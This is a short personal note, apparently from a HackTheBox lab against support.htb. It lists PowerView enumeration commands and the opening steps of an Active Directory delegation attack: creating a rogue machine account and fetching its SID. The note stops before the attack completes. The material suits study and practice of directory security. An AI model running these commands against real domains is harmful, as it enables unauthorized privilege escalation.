<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../../style.css">
    <base target="_parent">
    <title data-trilium-title>Kerberos Constrained Delegation</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>Kerberos Constrained Delegation</h1>

      <div class="ck-content">
        <p>get powerview.ps1 on the machine. We can check if users are allowed to
          create a new computer object on the domain.</p><pre><code class="language-text-plain">Get-DomainObject -Identity "dc=support,dc=htb" -Domain support.htb</code></pre>

        <p>Finally, we have to check if the target does not have the attribute <code>msds-allowedtoactonbehalfofotheridentity</code> set.</p><pre><code class="language-text-plain">hostname
Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity</code></pre>

        <p><span class="text-big">Exploitation:</span>

        </p><pre><code class="language-text-plain">New-MachineAccount -MachineAccount someuser -Password $(ConvertTo-SecureString 'password123' -AsPlainText -Force) -Verbose
Get-DomainComputer someuser -Properties objectsid</code></pre>
      </div>
    </div>
  </body>

</html>